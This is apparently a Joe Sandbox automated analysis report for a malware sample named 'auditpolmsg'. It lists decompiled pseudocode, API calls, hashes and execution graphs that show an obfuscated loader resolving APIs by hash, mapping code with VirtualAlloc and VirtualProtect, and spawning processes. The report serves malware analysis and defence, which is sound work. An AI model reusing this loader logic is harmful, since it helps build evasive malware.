                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x36e1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E00363E60(_t93, E00363F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x36e1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x36e494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E00363E60(_t93, E00363F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x36e494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x36dd18 == 0) {
                                                        								 *0x36dd18 = E00363E60(_t93, E00363F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x36e43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E00363E60(_t93, E00363F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x36e43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E00363D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x003630a2
                                                        0x003630a6
                                                        0x003630ac
                                                        0x003630b1
                                                        0x003630b6
                                                        0x003630ba
                                                        0x003630ba
                                                        0x003630c0
                                                        0x003630c0
                                                        0x003630c0
                                                        0x003630c0
                                                        0x003630c5
                                                        0x00000000
                                                        0x00000000
                                                        0x003630cb
                                                        0x003631f1
                                                        0x003632f9
                                                        0x00363300
                                                        0x003631f7
                                                        0x003631f7
                                                        0x00000000
                                                        0x003631f7
                                                        0x003630d1
                                                        0x003630d6
                                                        0x003631e5
                                                        0x00000000
                                                        0x003630dc
                                                        0x003630e1
                                                        0x003631a0
                                                        0x003631a8
                                                        0x003631c0
                                                        0x003631c2
                                                        0x003631c2
                                                        0x003631ce
                                                        0x003631d0
                                                        0x003630ba
                                                        0x003630ba
                                                        0x00000000
                                                        0x003630ba
                                                        0x003630e7
                                                        0x003630ec
                                                        0x00000000
                                                        0x003630f2
                                                        0x003630f2
                                                        0x0036310d
                                                        0x00363111
                                                        0x0036311f
                                                        0x00363123
                                                        0x00363130
                                                        0x00363139
                                                        0x00363147
                                                        0x0036314b
                                                        0x00363153
                                                        0x0036315b
                                                        0x00363175
                                                        0x0036317f
                                                        0x00363187
                                                        0x0036318b
                                                        0x00363193
                                                        0x003630ba
                                                        0x003630ba
                                                        0x00000000
                                                        0x003630ba
                                                        0x003630ba
                                                        0x003630ec
                                                        0x003630e1
                                                        0x003630d6
                                                        0x00000000
                                                        0x003630cb
                                                        0x00363206
                                                        0x00363245
                                                        0x0036324c
                                                        0x0036325f
                                                        0x00363264
                                                        0x00363264
                                                        0x0036326b
                                                        0x00363274
                                                        0x0036328c
                                                        0x0036328c
                                                        0x00363299
                                                        0x0036329b
                                                        0x0036329f
                                                        0x00000000
                                                        0x003632a1
                                                        0x003632a1
                                                        0x00000000
                                                        0x003632a1
                                                        0x00363208
                                                        0x0036320d
                                                        0x003632ab
                                                        0x003632b3
                                                        0x003632cb
                                                        0x003632cd
                                                        0x003632cd
                                                        0x003632e4
                                                        0x003632e6
                                                        0x003632ed
                                                        0x003632f0
                                                        0x003632f3
                                                        0x00000000
                                                        0x00363213
                                                        0x00363218
                                                        0x00000000
                                                        0x0036321a
                                                        0x00363221
                                                        0x00363223
                                                        0x003630ba
                                                        0x003630ba
                                                        0x00000000
                                                        0x003630ba
                                                        0x003630ba
                                                        0x00363218
                                                        0x0036320d
                                                        0x00000000
                                                        0x0036322d
                                                        0x0036322d
                                                        0x00363242
                                                        0x00000000
                                                        0x00363242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00363299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: f6b014f82c9e455828b9646c1f3ff6ece1f34813de59abeaa97a4c4c336fe78a
                                                        • Instruction ID: 6f7607f91e33b1d4e7868c1d9a3b7fbdc5a55325e3ee53b96398c2d8d8817795
                                                        • Opcode Fuzzy Hash: f6b014f82c9e455828b9646c1f3ff6ece1f34813de59abeaa97a4c4c336fe78a
                                                        • Instruction Fuzzy Hash: 7751C071B083018BC71ADF6CC49552ABBEAEBD5344F20881EF452CB359DB71DA498792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 367080-367092 call 3634c0 583 367094-3670aa call 363f00 call 363e60 580->583 584 3670af-3670c3 LoadLibraryW 580->584 583->584 586 3670c5-3670db call 363f00 call 363e60 584->586 587 3670e0-3670eb 584->587 586->587 594 3670ed-367103 call 363f00 call 363e60 587->594 595 367108-367110 587->595 594->595
                                                        C-Code - Quality: 75%
                                                        			E00367080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E003634C0(__ecx);
                                                        				if( *0x36dd1c == 0) {
                                                        					 *0x36dd1c = E00363E60(__ebx, E00363F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x36e548; // 0x607e28
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x36e494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E00363E60(_t15, E00363F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x36e494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x36df30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00363E60(_t15, E00363F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x36df30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x00367080
                                                        0x00367082
                                                        0x00367089
                                                        0x00367092
                                                        0x003670aa
                                                        0x003670aa
                                                        0x003670b0
                                                        0x003670b2
                                                        0x003670b8
                                                        0x003670bc
                                                        0x003670c3
                                                        0x003670d6
                                                        0x003670db
                                                        0x003670db
                                                        0x003670e2
                                                        0x003670e4
                                                        0x003670eb
                                                        0x003670fe
                                                        0x00367103
                                                        0x00367103
                                                        0x00367110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0036721D,003668AC), ref: 003670B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: (~`
                                                        • API String ID: 1029625771-890370922
                                                        • Opcode ID: fc67698f5a62a2247a58850ca6098499ee4fa5ea3b0d75f8d88bb2edd5ccb19d
                                                        • Instruction ID: ca658c432d4662320324f6f374820b64f0247f986fac7b807640fac04fdc3ac7
                                                        • Opcode Fuzzy Hash: fc67698f5a62a2247a58850ca6098499ee4fa5ea3b0d75f8d88bb2edd5ccb19d
                                                        • Instruction Fuzzy Hash: 6D016231B142104B9B17AF7A9C5162B2AAF9FD1788B11C029E415CF35EEFB1CD0297A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 603 2d0580-2d05be call 2d0ed0 606 2d05c0-2d05cf 603->606 607 2d05d2-2d05da 603->607 608 2d06e7-2d06ef 607->608 609 2d05e0-2d05e3 607->609 609->608 610 2d05e9-2d05eb 609->610 610->608 611 2d05f1-2d05fc 610->611 611->608 613 2d0602-2d0607 611->613 614 2d060d-2d0629 call 2d1140 RtlMoveMemory 613->614 615 2d06d8-2d06e4 613->615 618 2d062b-2d0630 614->618 619 2d0654-2d0659 614->619 622 2d0643-2d0652 618->622 623 2d0632-2d0641 618->623 620 2d066c-2d0678 619->620 621 2d065b-2d066a 619->621 624 2d0679-2d0699 call 2d1140 620->624 621->624 622->624 623->624 624->608 627 2d069b-2d06a3 VirtualProtect 624->627 628 2d06a5-2d06a8 627->628 629 2d06c6-2d06d5 627->629 628->608 630 2d06aa-2d06ad 628->630 630->608 631 2d06af-2d06b1 630->631 631->614 632 2d06b7-2d06c3 631->632
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002D061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 002D069C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 8aaf8d2fa3937d9e23b0f5cae5288957c577d909dd6339c28dede6955c996dd3
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 093156B367420657E3249A69DCC5BEBA3C8DBD1355F48483BF905C23A0D52EDC78C2A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 633 365ce0-365cec call 3665e0 636 365cee-365d04 call 363f00 call 363e60 633->636 637 365d09-365d0d ExitProcess 633->637 636->637
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E003665E0();
                                                        				if( *0x36ddb8 == 0) {
                                                        					 *0x36ddb8 = E00363E60(_t5, E00363F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x00365ce0
                                                        0x00365cec
                                                        0x00365d04
                                                        0x00365d04
                                                        0x00365d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 00365D0B
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: a729e3b761fe0461bd27aa5c9f61b1836ea06b2a5485e7b4523f249a0cd5b858
                                                        • Instruction ID: f814bbcd4b1b350ba95c5acf9f1f6b4e6c5a2ab5edd9738cba6182e9bef2e64f
                                                        • Opcode Fuzzy Hash: a729e3b761fe0461bd27aa5c9f61b1836ea06b2a5485e7b4523f249a0cd5b858
                                                        • Instruction Fuzzy Hash: 3DD0C961B4420546DA46BBB5585676A25AA4FA0748F10C029E011CF29EEEA08910A3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 642 2d0ad0-2d0b31 call 2d0ed0 645 2d0b47-2d0b4d 642->645 646 2d0b33-2d0b42 642->646 648 2d0b5f-2d0b7b 645->648 649 2d0b4f-2d0b54 645->649 647 2d0d40 646->647 651 2d0b7d-2d0b8e 648->651 652 2d0b90 648->652 649->648 653 2d0b96-2d0b9c 651->653 652->653 655 2d0bae-2d0bca 653->655 656 2d0b9e-2d0ba3 653->656 658 2d0bcc-2d0bd4 655->658 659 2d0bd7-2d0c21 VirtualAlloc 655->659 656->655 658->659 663 2d0d1a-2d0d24 659->663 664 2d0c27-2d0c2e 659->664 663->647 665 2d0c44-2d0c4b 664->665 666 2d0c30-2d0c3f 664->666 667 2d0c5d-2d0c79 665->667 668 2d0c4d-2d0c52 665->668 666->647 670 2d0c7b-2d0c83 667->670 671 2d0c86-2d0c8d 667->671 668->667 670->671 672 2d0c9f-2d0cbb 671->672 673 2d0c8f-2d0c94 671->673 675 2d0cbd-2d0cc5 672->675 676 2d0cc8-2d0cfa VirtualAlloc 672->676 673->672 675->676 679 2d0d02-2d0d07 676->679 679->663 680 2d0d09-2d0d18 679->680 680->647
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 002D0BFF
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 3a871adc4765540a30521ef04c1f8330e79eb17a11b67b9af8aace36232de365
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 81511770650218ABDB209F54CE85FEAB7B8EF54701F004096FA08B72A0D7B89D85CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002D02F6
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: 136393f4b6b9e60466a3a0c8f61a1ab6dcf14c9a510c847266d2a9f3fbeadf84
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 9D513AB1911268ABDB20DF64DD88BDEB778EF88700F0045DAE509B7260DB745E85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 87935a3622729bac05418ffb5e134a489f7b542a2dfe9b629a89898ecbe62a48
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 27311938E511289BCB04DB98CD80AED7BB5EF4C340B50802BD506737A4DB789D86CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 3141528e171d2d5a7f9c54192b29c9775318c35bd293e4b53f5a5dc25bce7cdf
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 405192B2A283025BD720DE26C881B5BB3D8ABD4794F04452FF948E7351E235DC249BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 2917d218ac147a0956ab3600468263ea0c57a5f528df01d156992e095249fe59
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: B44138B56343025BC314DE69CC85BABB2D8ABC4B51F08483FF644D6354D2B0DD2887A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1169
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 5818 3a0170 5819 3a01fb 5818->5819 5834 3a0ad0 5819->5834 5825 3a02c4 5871 3a06f0 5825->5871 5827 3a02d0 5888 3a08f0 5827->5888 5829 3a02dc 5906 3a0580 5829->5906 5831 3a02e8 5832 3a02ef VirtualFree 5831->5832 5833 3a02fb 5831->5833 5832->5833 5835 3a0b2f 5834->5835 5836 3a0bf0 VirtualAlloc 5835->5836 5837 3a02ab 5835->5837 5838 3a0c1c 5836->5838 5840 3a0d60 5837->5840 5838->5837 5839 3a0cdb VirtualAlloc 5838->5839 5839->5837 5841 3a0d94 5840->5841 5842 3a0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 3a02b8 5842->5843 5847 3a0ddb 5842->5847 5850 3a0400 GetCurrentProcess 5843->5850 5845 3a0e0d RtlMoveMemory 5845->5847 5846 3a0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 3a0e91 RtlFillMemory 5847->5848 5849 3a0e6a RtlMoveMemory 5847->5849 5914 3a1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 3a1140 lstrcpynW 5850->5915 5852 3a0459 NtQueryInformationProcess 5853 3a046f 5852->5853 5856 3a04c5 5852->5856 5854 3a0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5854 5855 3a0484 GetProcessHeap HeapFree 5853->5855 5860 3a0575 5853->5860 5854->5853 5854->5856 5855->5854 5857 3a04e5 5856->5857 5921 3a1140 lstrcpynW 5856->5921 5916 3a1140 lstrcpynW 5857->5916 5861 3a04dc RtlMoveMemory 5861->5857 5862 3a04ef RtlMoveMemory 5917 3a1140 lstrcpynW 5862->5917 5864 3a0511 RtlMoveMemory 5918 3a1140 lstrcpynW 5864->5918 5866 3a0528 RtlMoveMemory 5919 3a1140 lstrcpynW 5866->5919 5868 3a053f RtlMoveMemory 5920 3a1140 lstrcpynW 5868->5920 5870 3a055a RtlMoveMemory 5870->5825 5872 3a0740 5871->5872 5874 3a0744 5872->5874 5922 3a0fb0 5872->5922 5874->5827 5875 3a0770 5875->5874 5878 3a07ff LoadLibraryA 5875->5878 5930 3a1140 lstrcpynW 5875->5930 5877 3a07b5 RtlMoveMemory 5877->5875 5879 3a08b9 5878->5879 5886 3a080f 5878->5886 5879->5827 5881 3a082d RtlMoveMemory 5881->5875 5881->5886 5882 3a0858 GetProcAddress 5882->5874 5882->5886 5884 3a0872 RtlMoveMemory 5933 3a1140 lstrcpynW 5884->5933 5886->5874 5886->5875 5886->5882 5887 3a0890 RtlMoveMemory 5886->5887 5931 3a1140 lstrcpynW 5886->5931 5932 3a1140 lstrcpynW 5886->5932 5887->5874 5887->5886 5889 3a0934 5888->5889 5890 3a0fb0 2 API calls 5889->5890 5891 3a0938 5889->5891 5892 3a0970 5890->5892 5891->5829 5892->5891 5936 3a1140 lstrcpynW 5892->5936 5894 3a09af RtlMoveMemory 5894->5891 5900 3a09c2 5894->5900 5897 3a09f6 RtlMoveMemory 5897->5900 5898 3a0a97 RtlMoveMemory 5899 3a0aac 5898->5899 5898->5900 5899->5829 5900->5891 5937 3a1140 lstrcpynW 5900->5937 5938 3a1140 lstrcpynW 5900->5938 5940 3a1140 lstrcpynW 5900->5940 5902 3a0a3e RtlMoveMemory 5902->5891 5903 3a0a57 5902->5903 5939 3a1140 lstrcpynW 5903->5939 5905 3a0a61 RtlMoveMemory 5905->5900 5907 3a05bc 5906->5907 5908 3a05c0 5907->5908 5912 3a069b VirtualProtect 5907->5912 5941 3a1140 lstrcpynW 5907->5941 5942 3a1140 lstrcpynW 5907->5942 5908->5831 5910 3a0617 RtlMoveMemory 5910->5907 5912->5907 5913 3a06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 3a0fda 5922->5924 5923 3a104a 5923->5875 5924->5923 5934 3a1140 lstrcpynW 5924->5934 5926 3a1001 5935 3a1140 lstrcpynW 5926->5935 5928 3a101b RtlMoveMemory 5929 3a1029 5928->5929 5929->5875 5930->5877 5931->5881 5932->5884 5933->5886 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5910 5942->5907 5996 3b4b70 5997 3b4b82 5996->5997 6000 3b4b98 5996->6000 5998 3b3f00 GetPEB 5997->5998 5999 3b4b8c 5998->5999 6001 3b3e60 GetPEB 5999->6001 6002 3b4bd7 CreateProcessW 6000->6002 6005 3b3f00 GetPEB 6000->6005 6001->6000 6003 3b4c73 6002->6003 6004 3b4bf7 6002->6004 6006 3b4bff 6004->6006 6008 3b4c33 6004->6008 6011 3b3f00 GetPEB 6004->6011 6007 3b4bc6 6005->6007 6009 3b3e60 GetPEB 6007->6009 6014 3b4c5d 6008->6014 6015 3b3f00 GetPEB 6008->6015 6010 3b4bd2 6009->6010 6010->6002 6012 3b4c27 6011->6012 6013 3b3e60 GetPEB 6012->6013 6013->6008 6016 3b4c51 6015->6016 6017 3b3e60 GetPEB 6016->6017 6017->6014 6889 3b64b0 6890 3b64ba 6889->6890 6891 3b64d0 6889->6891 6892 3b3f00 GetPEB 6890->6892 6895 3b42c0 GetPEB 6891->6895 6898 3b659a 6891->6898 6893 3b64c4 6892->6893 6894 3b3e60 GetPEB 6893->6894 6894->6891 6896 3b657b 6895->6896 6896->6898 6899 3b4160 6896->6899 6900 3b4172 6899->6900 6904 3b4180 6899->6904 6901 3b3f00 GetPEB 6900->6901 6902 3b4177 6901->6902 6903 3b3e60 GetPEB 6902->6903 6903->6904 6904->6898 6911 3b78b0 6921 3b7990 6911->6921 6912 3b34c0 GetPEB 6912->6921 6913 3b7c1e 6914 3b7c3d 6913->6914 6916 3b3f00 GetPEB 6913->6916 6915 3b7c05 6917 3b7c31 6916->6917 6918 3b3e60 GetPEB 6917->6918 6918->6914 6919 3b3f00 GetPEB 6919->6921 6920 3b3e60 GetPEB 6920->6921 6921->6912 6921->6913 6921->6915 6921->6919 6921->6920 6922 3b7fb0 6923 3b34c0 GetPEB 6922->6923 6924 3b7fc2 6923->6924 6925 3b7fe3 6924->6925 6926 3b3f00 GetPEB 6924->6926 6928 3b8029 6925->6928 6930 3b3f00 GetPEB 6925->6930 6927 